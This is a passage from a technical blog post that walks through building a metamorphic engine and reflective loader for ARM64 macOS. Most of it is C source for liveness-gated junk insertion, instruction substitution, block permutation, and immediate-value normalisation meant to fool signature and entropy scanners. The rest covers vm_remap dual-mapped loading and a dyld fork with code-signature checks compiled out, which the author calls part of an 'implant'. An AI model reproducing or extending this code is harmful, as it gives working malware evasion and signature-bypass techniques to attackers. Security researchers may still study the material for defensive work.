The chain builder handles branches by consulting liveness: if a register is live-out at a conditional branch, the value reaches some path beyond the branch, so the chain continues scanning the fallthrough. If it’s dead, the chain ends there.
How the Mutation Engine Uses All This
Every mutation decision flows through liveness. The mutate_ctx_t struct carries the full analysis state:
typedef struct {
const arm64_inst_t *insns;
const inst_live_t *live;
const slot_live_t *slive;
const bool *loop_body;
int n;
int idx;
aether_rng_t *rng;
} mutate_ctx_t;
Junk insertion calls dead_regs() to find available registers, checks whether flag-clobbering variants are allowed, and consults loop_body to further restrict the dead set inside loops. Equivalent substitution uses pick_dead() to find scratch registers for multi-instruction expansions. Block permutation uses liveness_full() to verify that reordering doesn’t break inter-block register dependencies.
The entire mutation engine is, at its core, a consumer of liveness information. Without it, you’re guessing. With it, you have a proof that every transformation preserves semantics.
- Liveness Analysis in Compiler Design
- Register Allocation
- Compiler Optimization: Register Allocation OpenEuler
Mutation Tricks
Everything up to this point (the disassembler, the liveness analyzer, the Mach-O parser) exists to serve these transforms. Each one changes the binary’s appearance while preserving its behavior. Stack them across N generations and the output shares nothing with the input at the byte level.
The simplest transform: shove instructions into the code stream that do nothing, really. The trick is making them look real.
The engine has two modes. Dead-register junk writes to registers nobody cares about. Live-read junk reads registers that are actually in use but writes the result to a dead register, making it look like genuine computation to any analyzer.
Dead-register junk picks from the dead set and generates arithmetic, logical, or move operations:
uint32_t gen_junk(mutate_ctx_t *ctx) {
int i = ctx->idx;
regset_t dead = dead_regs(ctx->live, i);
/* Inside a loop exclude loop-live regs */
if (ctx->loop_body && ctx->loop_body[i]) {
regset_t ll = loop_live_regs(ctx->insns, ctx->live, ctx->n,
ctx->loop_body, i);
dead &= ~ll;
}
bool fl_dead = flags_are_dead(ctx->live, i);
uint8_t d1 = pick_dead(ctx, dead);
if (d1 == 0xFF) return 0xD503201F; /* nop */
uint8_t d2 = pick_dead(ctx, dead & ~REG_BIT(d1));
/* ... more shii ... */
}
The selection matrix depends on what’s available. Two dead registers and dead flags gives you the widest variety: 12 different instruction forms including ADDS, SUBS, ANDS, MUL, shifts, and moves. One dead register with live flags restricts you to non-flag-setting variants like ADD, SUB, MOVZ, and MOV. The engine picks randomly from whatever’s legal at that point.
Live-read junk is more interesting. It picks a register that’s actually carrying a live value and uses it as a source operand, writing the result to a dead register:
uint32_t gen_live_junk(mutate_ctx_t *ctx) {
/* ... */
regset_t live_regs = ctx->live[i].live_out & 0x1FFFFFFFu;
uint8_t lr = /* random live register */;
uint8_t d = /* random dead register */;
switch (rng(ctx) % 10) {
case 0: return enc_add_imm(d, lr, imm, sf); /* ADD dead, live, #imm */
case 1: return enc_sub_imm(d, lr, imm, sf); /* SUB dead, live, #imm */
case 2: return enc_orr_reg(d, lr, lr, sf); /* ORR dead, live, live */
case 3: return enc_and_reg(d, lr, lr, sf); /* AND dead, live, live */
/* ... more ... */
}
}
To a disassembler ADD X11, X3, #7 looks like it’s computing something with X3. And X3 is carrying a real value. The instruction just happens to write to X11, which nobody reads afterward. There’s no way to distinguish this from real code without doing your own liveness analysis on the mutated binary.
Before:
0x00: STP X29, X30, [SP, #-16]!
0x04: MOV X29, SP
0x08: MOV X8, X0
0x0c: LDR X9, [X8, #16]
0x10: ADD X10, X9, #1
0x14: CMP X10, #100
0x18: B.GE #24
0x1c: STR X10, [X8, #16]
0x20: MOV X0, #1
0x24: LDP X29, X30, [SP], #16
0x28: RET
After (generation 1, expand):
0x00: STP X29, X30, [SP, #-16]!
0x04: MOV X29, SP
0x08: ORR X11, X29, X29 ; junk: live-read X29, write dead X11
0x0c: MOV X8, X0
0x10: SUB X3, X8, #12 ; junk: live-read X8, write dead X3
0x14: LDR X9, [X8, #16]
0x18: ADD X10, X9, #1
0x1c: ADD X5, X9, #63 ; junk: live-read X9, write dead X5
0x20: CMP X10, #100
0x24: B.GE #28
0x28: MOVZ X14, #0x8 ; junk: write dead X14
0x2c: STR X10, [X8, #16]
0x30: MOV X0, #1
0x34: LDP X29, X30, [SP], #16
0x38: RET
The original 11 instructions became 15. Four junk instructions inserted, each provably safe via liveness. The live-read variants (X29, X8, X9 as sources) are indistinguishable from real computation without dataflow analysis.
Equivalent Substitution
Replace an instruction with a different instruction (or sequence) that produces the same result. The semantics are identical; the encoding is completely different.
The engine handles the common cases: moves, adds, subtracts, compares, and immediate loads:
int equiv_subst(mutate_ctx_t *ctx, uint32_t *out) {
const arm64_inst_t *inst = &ctx->insns[ctx->idx];
bool fl = flags_are_dead(ctx->live, ctx->idx);
uint8_t scratch = pick_dead(ctx, dead_regs(ctx->live, ctx->idx));
uint32_t r = rng(ctx);
switch (inst->op) {
case ARM_OP_MOV_REG: {
uint8_t d = inst->rd, m = inst->rm;
bool sf = inst->is_64bit;
switch (r % 3) {
case 0: out[0] = enc_add_imm(d, m, 0, sf); return 1;
case 1: out[0] = enc_eor_reg(d, m, 31, sf); return 1;
case 2:
if (scratch != 0xFF) {
out[0] = enc_orr_reg(scratch, 31, m, sf);
out[1] = enc_orr_reg(d, 31, scratch, sf);
return 2;
}
out[0] = enc_add_imm(d, m, 0, sf);
return 1;
}
}
case ARM_OP_ADD:
if (!inst->sets_flags && inst->imm > 0 && inst->imm <= 0xFFF) {
uint8_t d = inst->rd, n = inst->rn;
bool sf = inst->is_64bit;
uint16_t imm = (uint16_t)inst->imm;
switch (r % 3) {
case 0: /* MOVZ scratch, #imm; ADD Xd, Xn, scratch */
if (scratch != 0xFF) {
out[0] = enc_movz(scratch, imm, sf);
out[1] = enc_add_reg(d, n, scratch, sf);
return 2;
}
return 0;
case 2: /* Split: ADD Xd,Xn,#a; ADD Xd,Xd,#b where a+b=imm */
if (imm >= 2) {
uint16_t a = (rng(ctx) % (imm - 1)) + 1;
out[0] = enc_add_imm(d, n, a, sf);
out[1] = enc_add_imm(d, d, imm - a, sf);
return 2;
}
}
}
break;
case ARM_OP_MOV_IMM: {
uint8_t d = inst->rd;
bool sf = inst->is_64bit;
uint64_t mask = sf ? ~0ULL : 0xFFFFFFFFULL;
uint64_t uval = (uint64_t)inst->imm & mask;
uint64_t inv = ~uval & mask;
if (inv <= 0xFFFF) {
out[0] = enc_movn(d, (uint16_t)inv, sf);
return 1;
}
if (uval <= 0xFFF && fl) {
out[0] = enc_eor_reg(d, d, d, sf); /* zero via XOR */
out[1] = enc_add_imm(d, d, uval, sf); /* then add */
return 2;
}
}
/* ... CMP, SUB, SUBS cases ... */
}
}
Every substitution is gated on liveness. The 2-instruction expansions need a scratch register; pick_dead() finds one from the dead set. If no scratch is available, the engine falls back to 1-for-1 replacements or skips the substitution entirely. The ADD split is particularly nice: ADD X5, X3, #100 becomes ADD X5, X3, #37; ADD X5, X5, #63 with a random partition each time. Same result, different immediate values, different instruction count.
Before:
0x1000: MOV X5, X3 ; ORR X5, XZR, X3
0x1004: ADD X6, X5, #100
0x1008: MOV X0, #0xFF
0x100c: CMP X6, #100
After (generation 1):
0x1000: ADD X5, X3, #0 ; MOV > ADD with zero immediate
0x1004: MOVZ X11, #100
0x1008: ADD X6, X5, X11 ; Then register-form ADD
0x100c: ORR X0, XZR, #0xFF ; MOV-imm > ORR with bitmask immediate
0x1010: SUBS XZR, X6, X11 ; CMP > explicit SUBS with scratch
After (generation 2, mutating generation 1's):
0x1000: EOR X5, X3, XZR
0x1004: MOVZ X14, #100
0x1008: ADD X6, X5, X14
0x100c: EOR X0, X0, X0 ; ORR-imm > XOR-zero
0x1010: ADD X0, X0, #0xFF
0x1014: MOVZ X11, #100
0x1018: SUBS XZR, X6, X11 ; then register-form SUBS
Four instructions became five, then seven. Each generation compounds the previous one’s substitutions. The original MOV X5, X3 has been through two transformations and is now EOR X5, X3, XZR a completely different opcode with the same semantics. A signature that matched ORR Xd, XZR, Xm at generation 0 sees nothing recognizable by generation 2.
The key constraint is the can_grow flag in the code. During expand generations (odd), multi-instruction substitutions are allowed and code grows. During reshape generations (even), only 1-for-1 replacements are permitted the code changes shape without changing size. This is the ol’ school style alternating strategy that prevents unbounded growth while still producing infinite unique generations.
Block Reordering
So you got two levels: local window reordering (swap individual instructions within a small window) and global block permutation (shuffle entire basic blocks with branch fixups).
Window Reordering
Two instructions can swap positions if there are no data dependencies between them. The dependency check is thorough: it covers all three hazard types from classical pipeline theory:
bool can_reorder(const arm64_inst_t *insns, const inst_live_t *live, int a, int b) {
const arm64_inst_t *ia = &insns[a], *ib = &insns[b];
if (ia->is_control_flow || ib->is_control_flow) return false;
if (ia->is_privileged || ib->is_privileged) return false;
if (!ia->valid || !ib->valid) return false;
/* Memory alias analysis */
if (ia->addr_mode && ib->addr_mode) {
/* Pre/post-index modify base - never reorder */
if (ia->addr_mode == ADDR_PRE_INDEX || ia->addr_mode == ADDR_POST_INDEX) return false;
if (ib->addr_mode == ADDR_PRE_INDEX || ib->addr_mode == ADDR_POST_INDEX) return false;
if (!mem_is_store(ia) && !mem_is_store(ib)) goto check_regs;
/* Same base + non-overlapping offsets: safe */
if (ia->rn == ib->rn && ia->addr_mode == ADDR_OFFSET && ib->addr_mode == ADDR_OFFSET) {
int64_t a_hi = ia->imm + ia->access_size;
int64_t b_hi = ib->imm + ib->access_size;
if (a_hi <= ib->imm || b_hi <= ia->imm) goto check_regs;
}
return false; /* conservative: assume aliasing */
}
check_regs:
/* RAW: A writes, B reads same register */
/* WAW: A writes, B writes same register */
/* WAR: A reads, B writes same register */
for (int i = 0; i < ia->num_regs_written; i++) {
uint8_t wr = ia->regs_written[i];
for (int j = 0; j < ib->num_regs_read; j++)
if (wr == ib->regs_read[j]) return false;
for (int j = 0; j < ib->num_regs_written; j++)
if (wr == ib->regs_written[j]) return false;
}
for (int i = 0; i < ia->num_regs_read; i++)
for (int j = 0; j < ib->num_regs_written; j++)
if (ia->regs_read[i] == ib->regs_written[j]) return false;
/* Flag dependencies */
if (ia->sets_flags && ib->reads_flags) return false;
if (ia->reads_flags && ib->sets_flags) return false;
if (ia->sets_flags && ib->sets_flags) return false;
return true;
}
RAW (Read-After-Write): instruction B reads a register that A writes. Swapping them means B reads the old value instead of A’s result. Broken. WAW (Write-After-Write): both write the same register. Swapping changes which value survives. Broken. WAR (Write-After-Read): B writes a register that A reads. Swapping means A reads B’s value instead of the original. Broken.
If none of these hazards exist, the two instructions are independent and can execute in either order. The memory alias analysis adds another layer: two stores to the same address can’t be reordered, but two loads can, and a load and store to provably different offsets can.
The window reorderer applies this pairwise across small windows:
int reorder_window(arm64_inst_t *insns, const inst_live_t *live,
int start, int end, aether_rng_t *rng) {
int n = end - start;
int swaps = 0;
for (int trial = 0; trial < n * 2; trial++) {
int i = start + aether_rand_n(rng, n);
int j = start + aether_rand_n(rng, n);
if (i == j) continue;
/* Verify all intermediate instructions are also independent */
int lo = i < j ? i : j, hi = i < j ? j : i;
bool safe = true;
for (int k = lo + 1; k < hi && safe; k++) {
if (!can_reorder(insns, live, lo, k)) safe = false;
if (!can_reorder(insns, live, k, hi)) safe = false;
}
if (safe && can_reorder(insns, live, i, j)) {
arm64_inst_t tmp = insns[i];
insns[i] = insns[j];
insns[j] = tmp;
swaps++;
}
}
return swaps;
}
It picks random pairs and checks if swapping is cool, not just between the two endpoints but against every instruction in between. After each swap, liveness is recomputed for the window so subsequent swaps see accurate data. It’s very simple and kinda weak, but …
Before:
0x00: MOV X8, X0 ; [1] save argument
0x04: LDR X9, [X8, #16] ; [2] load field (depends on [1])
0x08: ADD X10, X9, #1 ; [3] increment (depends on [2])
0x0c: MOVZ X14, #0x8 ; [4] junk (independent)
0x10: CMP X10, #100 ; [5] compare (depends on [3])
After reordering:
0x00: MOV X8, X0 ; [1] can't move - [2] depends on it
0x04: MOVZ X14, #0x8 ; [4] moved up - independent of [2]
0x08: LDR X9, [X8, #16] ; [2] shifted down one slot
0x0c: ADD X10, X9, #1 ; [3] still after [2]
0x10: CMP X10, #100 ; [5] still after [3]
Instruction [4] was independent of everything between [1] and [5], so it floated up. The dependency chain [1]>[2]>[3]>[5] stayed in order. The code does the same thing, but the instruction sequence is different. Combined with junk insertion, the reordering interleaves real and fake instructions in unpredictable ways. Make sense?
Then there’s block permutation, which operates at a higher level. It identifies basic blocks within each function, shuffles their order, and inserts unconditional branches (trampolines) to maintain the original control flow:
size_t permute_blocks(const arm64_inst_t *insns, int n, uint32_t *out,
size_t out_max, aether_rng_t *rng) {
/* Find block leaders, split into basic blocks */
/* Build the block order table */
/* Shuffle everything except the entry block (Fisher-Yates) */
for (int i = nb - 1; i > 1; i--) {
int j = 1 + aether_rand_n(rng, i);
int t = order[i]; order[i] = order[j]; order[j] = t;
}
/* Emit blocks in the new order, insert trampolines, fix displacements */
/* ... */
}
The entry block (block 0) always stays first; it’s where execution begins. Everything else gets shuffled. When a block originally fell through to the next block but that block is now somewhere else, the engine inserts a B trampoline to bridge the gap. All branch displacements (B, B.cond, CBZ, CBNZ, TBZ, TBNZ) are recalculated against the new layout.
Before (3 blocks, linear):
Block 0 (entry):
0x00: CMP X0, #10
0x04: B.GE block2 > 0x14
Block 1 (fallthrough):
0x08: ADD X0, X0, #1
0x0c: STR X0, [X1]
0x10: B block2 > 0x14
Block 2 (exit):
0x14: MOV X0, #0
0x18: RET
After permutation (block order: 0, 2, 1):
Block 0 (entry):
0x00: CMP X0, #10
0x04: B.GE block2 > 0x0c (retargeted)
0x08: B block1 > 0x14 (trampoline inserted)
Block 2 (moved up):
0x0c: MOV X0, #0
0x10: RET
Block 1 (moved down):
0x14: ADD X0, X0, #1
0x18: STR X0, [X1]
0x1c: B block2 > 0x0c (retargeted)
The control flow is identical. The block layout is completely different. A linear scan of the binary sees CMP, B.GE, B, MOV, RET, ADD, STR, B the “exit” code appears before the “work” code. Every permutation produces a different layout, and with N blocks the number of possible orderings is (N-1)!.
We’re careful about function boundaries. The engine detects ’em via RET/RETAA instructions and only permutes blocks within a single function. Cross-function permutation would break stack frames and callee-saved register invariants.
Entropy
This is the subtlest problem. Every technique above changes the code, but if the changes are statistically distinguishable from real compiler output, a scanner catches you without ever looking at individual instructions.
The issue is immediate values. A real compiler generates code with heavily biased immediates. Structure field offsets cluster around small multiples of 8. Boolean checks use 0 and 1. Array bounds are small constants. The distribution is not uniform; it’s sharply skewed toward small values.
Naive junk generation picks random 12-bit or 16-bit immediates. A MOVZ X11, #0xB7A3 stands out because real code almost never loads arbitrary 16-bit values into registers.
So? The engine normalizes its immediate distribution to match real compiler output:
uint32_t r = rng(ctx);
uint16_t small_imm;
if ((r & 0xF) < 9) small_imm = rng(ctx) & 0xFF; /* 56% byte-sized */
else if ((r & 0xF) < 13) small_imm = rng(ctx) & 0x3F; /* 25% 6-bit (struct offsets) */
else small_imm = (rng(ctx) & 0x7) * 8; /* 19% aligned small */
56% of generated immediates are byte-sized (0–255). 25% are 6-bit values (0–63), matching common structure field offsets. 19% or so are small aligned values (0, 8, 16, 24, 32, 40, 48, 56), the kind you see in stack frame setup and array indexing. No random 16-bit values. No large constants that don’t appear in real code.
The same logic applies to shift amounts:
uint8_t shift = (rng(ctx) % 3) + 1; /* 1-3, not 1-63 */
Real code shifts by 1, 2, or 3 positions in the vast majority of cases. A LSL X11, X3, #47 is a red flag. LSL X11, X3, #2 looks like an array index calculation.
What this looks like in practice:
Naive junk (detectable):
MOVZ X11, #0xB7A3
ADD X5, X3, #0xD42
LSL X14, X8, #47 ; Compilers don't do this
SUBS X7, X2, #0xF91
Entropy-normalized junk (blends in):
MOVZ X11, #0x8
ADD X5, X3, #24 ; typical stack/struct access
LSL X14, X8, #2 ; looks like an array index (sizeof(int))
SUBS X7, X2, #0x30
Both are equally meaningless; they write to dead registers either way. But the second set is invisible to statistical analysis. The immediate values fall within the expected distribution for compiler-generated ARM64 code. A scanner computing Shannon entropy or chi-squared statistics over the immediate operand space sees nothing anomalous.
This is still not perfect. We just kinda profile a generic compiler output distribution, not the specific binary we’re mutating. A more sophisticated move would sample the actual immediate distribution from the host binary’s real instructions and match it exactly. That’s something for another day maybe, but the current one is good enough.
- ZPERM Virus Encyclopedia
- MetaPHOR source
- MetaPHOR Virus Encyclopedia
- 29A Group Virus Encyclopedia
- Metamorphic Engines Erkin Ekici
- Metamorphic Malware Jakob Friedl
- Hunting for Undetectable Metamorphic Viruses (PDF)
- Library: Metamorphism
- The Art of Self-Mutating Malware
Reflective Loading
Everything up to this point has been preparation. The metamorphic engine produces mutated code. The liveness analyzer ensures mutations are semantically correct. The equivalent substitution, junk insertion, and reordering passes make each generation look different.
But none of that matters if the result hits disk. The moment you write a file, you create an artifact: a hash, a code signature check, a Gatekeeper quarantine flag, a Spotlight index entry. The entire point of in-memory mutation is defeated by a single write() syscall.
The reflective loader solves this. Mutated code goes from a byte buffer in the heap to executable memory without ever touching the filesystem: mutate > wrap in Mach-O > load into memory > execute. No dlopen() of a path, no disk writes. That matters because if we change even a single byte of a signed binary, its code signature breaks, and macOS will refuse to run it. Code signing is a huge part of macOS security, so this is important.
W^X
macOS enforces Write XOR Execute. A memory page can be writable or executable, but not both simultaneously. This is enforced at the hardware level on Apple Silicon via the page table entries; vm_map_protect() in XNU (osfmk/vm/vm_map.c) will reject attempts to set VM_PROT_WRITE | VM_PROT_EXECUTE on the same mapping unless the process has specific entitlements (like com.apple.security.cs.allow-jit, which only debuggers and JIT engines get).
This creates a problem. You need to write mutated code into memory (requires VM_PROT_WRITE), then execute it (requires VM_PROT_EXECUTE). The naive approach (allocate writable, copy code, flip to executable) works, but creates a window where the page transitions are visible. More importantly, on hardened runtimes, vm_protect() from W to X on a page that was previously writable may be denied entirely.
How do we solve this? Create two virtual address ranges that point to the same physical pages. One mapping is RW (for writing), the other is RX (for execution). You write through the RW mapping, execute through the RX mapping. At no point does any single virtual address have both W and X permissions.
This is not a hack; it’s how Apple’s own JIT works in JavaScriptCore. The vm_remap() Mach trap creates a second virtual mapping of existing physical pages. It’s defined in osfmk/vm/vm_user.c in the XNU source and exposed through <mach/vm_map.h>.
inmem_binary_t *inmem_load(integrated_code_t *ic, macho_file_t *mf) {
if (!ic || !mf) return NULL;
inmem_binary_t *ib = calloc(1, sizeof(inmem_binary_t));
if (!ib) return NULL;
/* Calculate total VM size from segment layout */
uint64_t min_addr = UINT64_MAX, max_addr = 0;
for (int i = 0; i < mf->num_segments; i++) {
if (mf->segments[i].vmsize == 0) continue;
if (mf->segments[i].vmaddr < min_addr) min_addr = mf->segments[i].vmaddr;
if (mf->segments[i].vmaddr + mf->segments[i].vmsize > max_addr)
max_addr = mf->segments[i].vmaddr + mf->segments[i].vmsize;
}
ib->size = ((max_addr - min_addr) + 0xFFF) & ~0xFFF;
vm_address_t rw_addr = 0;
kern_return_t kr = vm_allocate(mach_task_self(), &rw_addr, ib->size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) { free(ib); return NULL; }
vm_protect(mach_task_self(), rw_addr, ib->size, FALSE, VM_PROT_READ | VM_PROT_WRITE);
vm_address_t rx_addr = 0;
vm_prot_t cur, max;
kr = vm_remap(mach_task_self(), &rx_addr, ib->size, 0,
VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
mach_task_self(), rw_addr, FALSE,
&cur, &max, VM_INHERIT_NONE);
Walk through the vm_remap arguments. mach_task_self() is both the target and source task: we’re remapping within our own address space. rx_addr is an output parameter, meanin’ the kernel picks the address (VM_FLAGS_ANYWHERE). rw_addr is the source: the pages we already allocated. The FALSE for copy is critical: it means “don’t copy the pages, share them.” Both virtual addresses now point to the same physical frames.
VM_FLAGS_RETURN_DATA_ADDR tells the kernel to return the address of the data pages rather than the beginning of the named entry. This matters on Apple Silicon where the kernel may insert guard pages.
After that, a simple protection flip on the RX view and a segment copy:
if (kr == KERN_SUCCESS) {
vm_protect(mach_task_self(), rx_addr, ib->size, FALSE,
VM_PROT_READ | VM_PROT_EXECUTE);
/* Copy segments through the RW mapping */
for (int i = 0; i < mf->num_segments; i++) {
if (mf->segments[i].filesize == 0) continue;
uint64_t offset = mf->segments[i].vmaddr - min_addr;
if (offset + mf->segments[i].filesize <= ib->size) {
if (mf->text_segment &&
mf->segments[i].vmaddr == mf->text_segment->vmaddr) {
memcpy((uint8_t*)rw_addr + offset, ic->code, ic->size);
} else {
memcpy((uint8_t*)rw_addr + offset,
mf->data + mf->segments[i].fileoff,
mf->segments[i].filesize);
}
}
}
ib->base_addr = (void*)rx_addr; /* execute from here */
ib->rw_addr = (void*)rw_addr; /* write through here */
ib->dual_mapped = true;
ib->entry_offset = mf->entry_point;
return ib;
}
The memcpy writes go to rw_addr (writable). But because the physical pages are shared, the bytes are immediately visible at rx_addr (executable). No permission flip, no race window, no mprotect dance. The code is written and executable in the same instant.
The __TEXT segment gets special treatment instead of copying from the original Mach-O data, it copies from ic->code, which is the mutated integrated code. Every other segment (if any) comes from the original binary. This is how the mutated code replaces the original while preserving the rest of the binary’s structure.
Yep, vm_remap can fail. Sandboxed processes may not have the mach_vm_remap right. Some MDM profiles restrict it. Hardened runtime with library validation can interfere. When dual-mapping fails, the loader falls back to single-mapping with a permission flip:
/* single mapping with W>X transition */
for (int i = 0; i < mf->num_segments; i++) {
if (mf->segments[i].filesize == 0) continue;
uint64_t offset = mf->segments[i].vmaddr - min_addr;
if (offset + mf->segments[i].filesize <= ib->size) {
if (mf->text_segment &&
mf->segments[i].vmaddr == mf->text_segment->vmaddr) {
memcpy((uint8_t*)rw_addr + offset, ic->code, ic->size);
} else {
memcpy((uint8_t*)rw_addr + offset,
mf->data + mf->segments[i].fileoff,
mf->segments[i].filesize);
}
}
}
vm_protect(mach_task_self(), rw_addr, ib->size, FALSE,
VM_PROT_READ | VM_PROT_EXECUTE);
ib->base_addr = (void*)rw_addr;
ib->rw_addr = NULL;
ib->dual_mapped = false;
Same allocation, same copy, but then a single vm_protect call flips the entire region from RW to RX. This works on most macOS configurations but has two downsides: the W>X transition is a detectable event (EDR can hook vm_protect via the ES subsystem), and once flipped to RX, you can’t write to those pages again without another flip. The dual-mapped path keeps the RW mapping alive, so future generations can overwrite the code in-place without any additional syscalls.
The inmem_binary_t struct tracks which path was taken:
typedef struct {
void *base_addr; /* RX mapping, execute from here */
void *rw_addr; /* RW mapping, write through here */
size_t size;
uint64_t entry_offset;
bool dual_mapped; /* true = vm_remap succeeded */
} inmem_binary_t;
Wrapping Mutated Code in Mach-O
Before loading, the raw mutated bytes need to be wrapped in a valid Mach-O structure. The engine constructs a minimal dylib from scratch: no linker involved, no disk I/O, pure in-memory construction:
uint8_t *wrap_macho(const uint8_t *code, size_t code_sz, size_t *out_sz) {
size_t hdr_sz = sizeof(struct mach_header_64)
+ sizeof(struct segment_command_64) /* __PAGEZERO */
+ sizeof(struct segment_command_64) + sizeof(struct section_64) /* __TEXT+__text */
+ sizeof(struct segment_command_64) /* __LINKEDIT */
+ sizeof(struct symtab_command)
+ sizeof(struct dysymtab_command)
+ sizeof(struct dyld_info_command);
size_t code_off = PG_ALIGN(hdr_sz);
size_t code_aln = PG_ALIGN(code_sz);
size_t link_off = code_off + code_aln;
size_t total = link_off + PG;
uint8_t *buf = calloc(1, total);
The layout is the absolute minimum a Mach-O dylib needs to be valid: __PAGEZERO (null page trap), __TEXT with a single __text section containing the mutated code, __LINKEDIT with empty symbol/string tables, and the three required load commands (LC_SYMTAB, LC_DYSYMTAB, LC_DYLD_INFO_ONLY). The PG_ALIGN macro rounds up to 16KB page boundaries (0x4000 on Apple Silicon, not 4KB like x86).
The header declares it as MH_DYLIB with MH_PIE | MH_NOUNDEFS | MH_DYLDLINK:
struct mach_header_64 *mh = (void *)buf;
mh->magic = MH_MAGIC_64;
mh->cputype = CPU_TYPE_ARM64;
mh->cpusubtype = CPU_SUBTYPE_ARM64_ALL;
mh->filetype = MH_DYLIB;
mh->ncmds = 6;
mh->flags = MH_NOUNDEFS | MH_DYLDLINK | MH_PIE;
MH_DYLIB rather than MH_EXECUTE because the reflective loader treats it as a loadable image, not a standalone executable. MH_NOUNDEFS tells the loader there are no undefined symbols to resolve no external dependencies, no dyld binding needed. MH_PIE enables ASLR-compatible loading at any base address.
The __TEXT segment’s protection is set to VM_PROT_READ | VM_PROT_EXECUTE with no write permission:
ts->maxprot = VM_PROT_READ | VM_PROT_EXECUTE;
ts->initprot = VM_PROT_READ | VM_PROT_EXECUTE;
This matches what a legitimate signed dylib would declare. If anything inspects the Mach-O headers in memory, the protection bits look normal. The actual write access comes through the dual-mapped RW region, which is at a completely different virtual address.
The LC_DYLD_INFO_ONLY command is present but zeroed no bind opcodes, no rebase opcodes, no exports trie. This means the image has no relocations to process, no symbols to resolve, no lazy binding stubs. It’s a self-contained blob of position-independent code. This is possible because the mutation engine already resolved all internal branches before wrapping.
The Userspace dyld
We glossed over custom_dlopen_from_memory earlier. It’s not a thin wrapper; it’s a full userspace reimplementation of dyld, Apple’s dynamic linker, compiled into a static library and linked directly into the implant. The source lives in [ReflectiveLoader/loader/src/](https://github.com/pwardle/ReflectiveLoader/tree/main/loader/src), built via cmake into lib/libloader.a. It’s derived from Apple’s open-source dyld, with all classes moved into the isolator namespace and every code signature check stripped out via #if UNSIGN_TOLERANT guards.
$ ar t lib/libloader.a
__.SYMDEF
ImageLoader.cpp.o
ImageLoaderMachO.cpp.o
ImageLoaderMachOCompressed.cpp.o
ImageLoaderProxy.cpp.o
ObjCRuntime.cpp.o
custom_dlfcn.cpp.o
dyld_stubs.cpp.o
Seven object files. The class hierarchy actually mirrors Apple’s dyld almost exactly: ImageLoader is the abstract base, ImageLoaderMachO handles segment mapping and load command parsing, and ImageLoaderMachOCompressed deals with the LINKEDIT format: bind opcodes, lazy binding, chained fixups, export tries. All of it lives under the isolator namespace to avoid symbol collisions with the real dyld running in the same process.
The CMake build compiles all .cpp files in ReflectiveLoader/loader/src/ with -DUNSIGN_TOLERANT=1 and packs them into a static archive:
add_library(${TARGET} STATIC ${SRC} ${HDR})
target_compile_definitions(${TARGET} PRIVATE UNSIGN_TOLERANT=1)
target_compile_options(${TARGET} PRIVATE -fdata-sections -ffunction-sections -fvisibility=hidden)
The UNSIGN_TOLERANT=1 define is the key modification. It gates 37 #ifdef blocks across the codebase: every place where Apple's dyld would validate a code signature, check LC_CODE_SIGNATURE, call csops(), or reject an unsigned binary, the check is compiled out. The -fvisibility=hidden flag ensures none of the internal isolator:: symbols leak into the final binary's export table.
$ nm -g lib/libloader.a | c++filt | grep "T _custom_dl"
0000000000001360 T _custom_dlopen_from_memory
0000000000000c4c T _custom_dlopen
0000000000001590 T _custom_dlsym
00000000000019b8 T _custom_dlclose
0000000000000c10 T _custom_dlerror
Five exported C functions: a drop-in replacement for <dlfcn.h>. The one that matters is custom_dlopen_from_memory. When quiet_load() calls it with a pointer to the wrapped Mach-O buffer and its length, here's what happens inside.
The call lands in custom_dlfcn.cpp ([ReflectiveLoader/loader/src/custom_dlfcn.cpp](https://github.com/pwardle/ReflectiveLoader/blob/main/loader/src/custom_dlfcn.cpp#L300)).
extern "C" void *custom_dlopen_from_memory(void *mh, int len) {
try {
const char *path = "foobar";
// Load image step
auto image = ImageLoaderMachO::instantiateFromMemory(
path, (macho_header *)mh, len, g_linkContext);
bool forceLazysBound = true;
bool preflightOnly = false;
bool neverUnload = false;
// Link step
std::vector<const char *> rpaths;
ImageLoader::RPathChain loaderRPaths(NULL, &rpaths);
image->link(g_linkContext, forceLazysBound, preflightOnly,
neverUnload, loaderRPaths, path);
// Register ObjC classes
registerObjC(static_cast<ImageLoaderMachO *>(image));
// Initialization of static objects
ImageLoader::InitializerTimingList initializerTimes[1];
initializerTimes[0].count = 0;
image->runInitializers(g_linkContext, initializerTimes[0]);
return image;
}
catch (const char *msg) {
return with_error("Error: " + std::string(msg));
}
catch (...) {
return with_error("Error: Unknown reason...");
}
}
Instantiate, link, register ObjC, run initializers. The path is a dummy string; there is no file. The g_linkContext is a global ImageLoader::LinkContext structure built by dyld_stubs.cpp with every callback stubbed out. The returned image pointer is an opaque handle that custom_dlsym can later use to resolve symbols.
instantiateFromMemory is where the Mach-O buffer becomes a loaded image. It calls sniffLoadCommands() to validate the header, count segments, locate LC_DYLD_INFO_ONLY or LC_DYLD_CHAINED_FIXUPS, and check for encryption. Then it dispatches to ImageLoaderMachOCompressed:
$ nm -g lib/libloader.a | c++filt | grep "instantiateFromMemory"
00000000000016c4 T isolator::ImageLoaderMachO::instantiateFromMemory(...)
0000000000000844 T isolator::ImageLoaderMachOCompressed::instantiateFromMemory(...)
ImageLoaderMachOCompressed::instantiateFromMemory parses the buffer into an in-memory image. The critical part is mapSegments(), the in-memory variant, not the file-descriptor variant. Here's what Apple's code does when the source is a memory buffer instead of a file:
// ImageLoaderMachO.cpp mapSegments (memory variant)
void ImageLoaderMachO::mapSegments(const void* memoryImage, uint64_t imageLen,
const LinkContext& context) {
intptr_t slide = this->assignSegmentAddresses(context, 0);
for (unsigned int i = 0, e = segmentCount(); i < e; ++i) {
vm_address_t loadAddress = segPreferredLoadAddress(i) + slide;
vm_address_t srcAddr = (uintptr_t)memoryImage + segFileOffset(i);
vm_size_t size = segFileSize(i);
kern_return_t r = vm_copy(mach_task_self(), srcAddr, size, loadAddress);
if (r != KERN_SUCCESS)
throw "can't map segment";
}
this->setSlide(slide);
// Set final permissions on each segment
for (unsigned int i = 0, e = segmentCount(); i < e; ++i)
segProtect(i, context);
}
No mmap, no file descriptor, no filesystem path. assignSegmentAddresses() picks a base address (respecting ASLR), then vm_copy() copies each segment from the in-memory buffer to its final load address. After all segments are placed, segProtect() sets the correct vm_protect permissions: r-x for __TEXT, rw- for __DATA, r-- for __LINKEDIT. The file-based mapSegments() variant uses mmap() with MAP_FIXED to map directly from disk; this variant uses vm_copy() because the source is already in our address space.
After mapping, the image goes through the standard dyld link sequence:
